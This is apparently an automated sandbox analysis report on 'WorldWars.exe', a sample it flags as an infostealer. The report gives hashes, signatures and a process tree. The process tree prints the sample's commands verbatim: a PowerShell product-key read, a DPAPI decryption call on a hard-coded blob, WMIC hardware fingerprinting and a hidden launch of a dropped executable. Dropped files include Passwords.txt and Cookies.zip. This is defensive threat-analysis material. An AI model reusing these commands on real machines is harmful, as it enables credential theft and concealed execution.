Resubmissions

16/07/2024, 12:36

240716-ps1mhswamh 7

16/07/2024, 01:37

240716-b2cedsyhjn 7

16/07/2024, 00:50

240716-a64h1azfkb 8

Analysis

  • max time kernel
    301s
  • max time network
    262s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags
    arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
  • submitted
    16/07/2024, 00:50

General

  • Target

    WorldWars.exe

  • Size

    154.6MB

  • MD5

    2083e38dc689c08455a74b5201f3ebb2

  • SHA1

    b905d6d3ba73eba3b219ea6de7bb7e42de2605fb

  • SHA256

    5a48729eeb6e105d5849faee5d4888841c02263622e2fdd5b66309186910d7a2

  • SHA512

    6d16116a78aded98f26b44f6277e92f7f3296a752eef8247b3976f718e5b79144f353451687ebde16f6a559d868b25b46a2b9c84dc306c015507ae93efadc528

  • SSDEEP

    1572864:uTmw0ciLNpDPuAvHxJLkY2O6Ea3f9kwZXeT6EivLp1vUAtdjtZn+f4FnIvGaC9dU:pv6E70+Mk

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\WorldWars.exe
    "C:\Users\Admin\AppData\Local\Temp\WorldWars.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:824
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1580
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2388
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:208
      • C:\Windows\system32\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:2896
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2112
      • C:\Windows\system32\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:1556
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,87,212,196,210,124,230,59,67,161,164,74,188,173,47,152,49,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,42,144,174,75,151,108,166,153,222,237,136,28,87,26,24,82,182,202,107,187,144,164,220,51,246,242,25,119,9,158,46,152,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,176,48,48,10,29,108,244,168,17,173,244,197,21,33,68,36,65,27,172,90,66,1,7,0,101,23,28,241,151,75,50,82,48,0,0,0,214,89,73,239,166,62,101,217,82,172,121,245,141,59,225,236,8,184,155,69,178,175,226,188,29,222,188,22,5,232,234,251,132,97,77,145,69,158,199,224,125,249,24,219,101,156,14,212,64,0,0,0,52,84,202,201,230,21,226,20,45,91,90,45,205,168,20,127,116,11,66,185,143,23,144,32,219,138,94,234,96,214,154,75,20,214,187,201,45,199,214,65,249,116,69,34,116,167,116,77,113,114,200,120,42,103,245,228,226,43,177,204,28,237,76,122), $null, 'CurrentUser')"
      2⤵
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:768
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,87,212,196,210,124,230,59,67,161,164,74,188,173,47,152,49,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,42,144,174,75,151,108,166,153,222,237,136,28,87,26,24,82,182,202,107,187,144,164,220,51,246,242,25,119,9,158,46,152,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,176,48,48,10,29,108,244,168,17,173,244,197,21,33,68,36,65,27,172,90,66,1,7,0,101,23,28,241,151,75,50,82,48,0,0,0,214,89,73,239,166,62,101,217,82,172,121,245,141,59,225,236,8,184,155,69,178,175,226,188,29,222,188,22,5,232,234,251,132,97,77,145,69,158,199,224,125,249,24,219,101,156,14,212,64,0,0,0,52,84,202,201,230,21,226,20,45,91,90,45,205,168,20,127,116,11,66,185,143,23,144,32,219,138,94,234,96,214,154,75,20,214,187,201,45,199,214,65,249,116,69,34,116,167,116,77,113,114,200,120,42,103,245,228,226,43,177,204,28,237,76,122), $null, 'CurrentUser')
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4564
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3632
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic cpu get name
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1240
    • C:\Users\Admin\AppData\Local\Temp\WorldWars.exe
      "C:\Users\Admin\AppData\Local\Temp\WorldWars.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\WorldWars" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1800 --field-trial-handle=1804,i,6384069091323226160,3249909332704969315,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
      2⤵
      PID:2680
    • C:\Users\Admin\AppData\Local\Temp\WorldWars.exe
      "C:\Users\Admin\AppData\Local\Temp\WorldWars.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\WorldWars" --mojo-platform-channel-handle=2184 --field-trial-handle=1804,i,6384069091323226160,3249909332704969315,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:4288
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get ProcessorId"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4068
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic cpu get ProcessorId
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:5028
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get Product"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4668
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic baseboard get Product
        3⤵
        PID:4644
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get SerialNumber"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4680
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic baseboard get SerialNumber
        3⤵
        PID:408
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption"
      2⤵
      PID:96
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic OS get caption
        3⤵
        PID:4396
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get TotalPhysicalMemory"
      2⤵
      PID:4320
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic computersystem get TotalPhysicalMemory
        3⤵
        PID:2280
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_videocontroller get caption,PNPDeviceID"
      2⤵
      PID:4440
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic path win32_videocontroller get caption,PNPDeviceID
        3⤵
        PID:1236
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get SerialNumber"
      2⤵
      PID:5096
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic diskdrive get SerialNumber
        3⤵
        PID:5052
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
      2⤵
      PID:4948
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic path win32_computersystemproduct get uuid
        3⤵
        PID:4472
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -WindowStyle Hidden -Command "& {Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\mt55v.exe' -ArgumentList 'zt43dmuzeM' -WindowStyle Hidden}""
      2⤵
      PID:1152
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -WindowStyle Hidden -Command "& {Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\mt55v.exe' -ArgumentList 'zt43dmuzeM' -WindowStyle Hidden}"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:4176
        • C:\Users\Admin\AppData\Local\Temp\mt55v.exe
          "C:\Users\Admin\AppData\Local\Temp\mt55v.exe" zt43dmuzeM
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:436
    • C:\Users\Admin\AppData\Local\Temp\WorldWars.exe
      "C:\Users\Admin\AppData\Local\Temp\WorldWars.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Roaming\WorldWars" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1328 --field-trial-handle=1804,i,6384069091323226160,3249909332704969315,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:408

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize: 3KB
    MD5: 5d574dc518025fad52b7886c1bff0e13
    SHA1: 68217a5f9e9a64ca8fed9eefa4171786a8f9f8f7
    SHA256: 755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2
    SHA512: 21de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: 96d660046a866f5d23d49d34293afeda
    SHA1: 32eb45e2a1f149223bd44b775a39951ceb8b8357
    SHA256: 990f6b9bf66790f2d6744f844cc2c3270387de665cdca0c1bc79195090690c52
    SHA512: a914da9f2a54a31cd64bfe40488e30a370fb04bc8fe680d328ffdbb5c757ebacb6c1b4826da7f06a052dd85af48e00946a9baa235fff1c7c90c53b3b6e3760ff

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: 6a15cfadc614cc97c6a9470ba8582a33
    SHA1: 1dc32c10fbe4a128fa76921e3c45b363e027798f
    SHA256: 6c3b442efc8f99114eaefb991fed4fe2b02bfc0fbcfc26e82aafe6ede0dd2f78
    SHA512: 6797a27fe112a003c456c1bc6fe1c1c443fe941b7b9f2c1b527d90273103b95c8c23d3cd15b4cc2688e65af5b695a95daaea2d7bf654c3ccc00e4ef5889b2fd2

  • C:\Users\Admin\AppData\Local\Temp\Autofills.txt
    Filesize: 85B
    MD5: 08dc8720082b2ede1ec6e33339f189c1
    SHA1: e1b7e75d052d2ad60f42d400e968a5e9aa91481d
    SHA256: 1de83568c3158f5b5e9ae372d31453115a5c166eb83692a6c94ea6c7e1e0387c
    SHA512: e9ed7977ac62e2ae15151e376d6ced8fd44a74cc62499bf61bf094f9862f99c1b8e1128b9a7d4971a6a726e27c559c99a155878297703f5161d9997a0ff0e6d5

  • C:\Users\Admin\AppData\Local\Temp\Cookies.zip
    Filesize: 22B
    MD5: 76cdb2bad9582d23c1f6f4d868218d6c
    SHA1: b04f3ee8f5e43fa3b162981b50bb72fe1acabb33
    SHA256: 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85
    SHA512: 5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

  • C:\Users\Admin\AppData\Local\Temp\Passwords.txt
    Filesize: 14B
    MD5: b4b41665eb819824e886204a28cc610b
    SHA1: e778edb6f635f665c0b512748b8fec6a2a23a88b
    SHA256: 635f814c1f34ee53ee62b67f989fec91eb0e08f63769ab4bd22cf4206a2cfff6
    SHA512: 37648652b1df14aa427382a4dac70d58a107d3dd77bd1977afc3acce8c56b7b6531b67d33f4b61b9fb8fbb9230ab0dfd461db07c1cc11a2923604e910a743d67

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bl1f3bos.woh.ps1
    Filesize: 1B
    MD5: c4ca4238a0b923820dcc509a6f75849b
    SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
    SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
    SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

  • C:\Users\Admin\AppData\Local\Temp\mt55v.exe
    Filesize: 41.7MB
    MD5: 3086eaa607229cc7db53731758a73bc4
    SHA1: 0eb46695a5b2c225e60a0bea6d3ccf020793928f
    SHA256: 805520950d228007ed5f7ebd994444fbc02b3ba9010cf8408b8b76123981b263
    SHA512: e72f3369c2759f0de5ac2b99058ac0bd1f3b6763a9b6a6a021b3fdab2d8c676dc26908a65ccd617e8cd5d9c589ee6d67434ec18bb5b7d85dc40fe6d9ee450ea7

  • \Users\Admin\AppData\Local\Temp\9cacdd6b-c87e-4b88-bb15-5e6873cc82e1.tmp.node
    Filesize: 1.4MB
    MD5: 56192831a7f808874207ba593f464415
    SHA1: e0c18c72a62692d856da1f8988b0bc9c8088d2aa
    SHA256: 6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c
    SHA512: c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33

  • \Users\Admin\AppData\Local\Temp\pkg\89cbacbc842eb08645bf0b2ea5a03f0a0504a213aa123242343e5588e2f0149c\launcher.node
    Filesize: 275KB
    MD5: b0de8894ef937d27715e81eedb6177b9
    SHA1: 7a3cce84c94c2a7cfc9b260d219d3738f0f93a99
    SHA256: 89cbacbc842eb08645bf0b2ea5a03f0a0504a213aa123242343e5588e2f0149c
    SHA512: 9166ddf27a1094817aba685c66bd2fc60d57c4d0961d96931a4e56bac34de339334532196253b676276241d88214e2927b1fc174acaf33296cf8f84e1455b055

  • memory/2388-15-0x000002927E4C0000-0x000002927E536000-memory.dmp
    Filesize: 472KB

  • memory/2388-12-0x000002927E310000-0x000002927E332000-memory.dmp
    Filesize: 136KB

  • memory/4564-70-0x000001BF21540000-0x000001BF21590000-memory.dmp
    Filesize: 320KB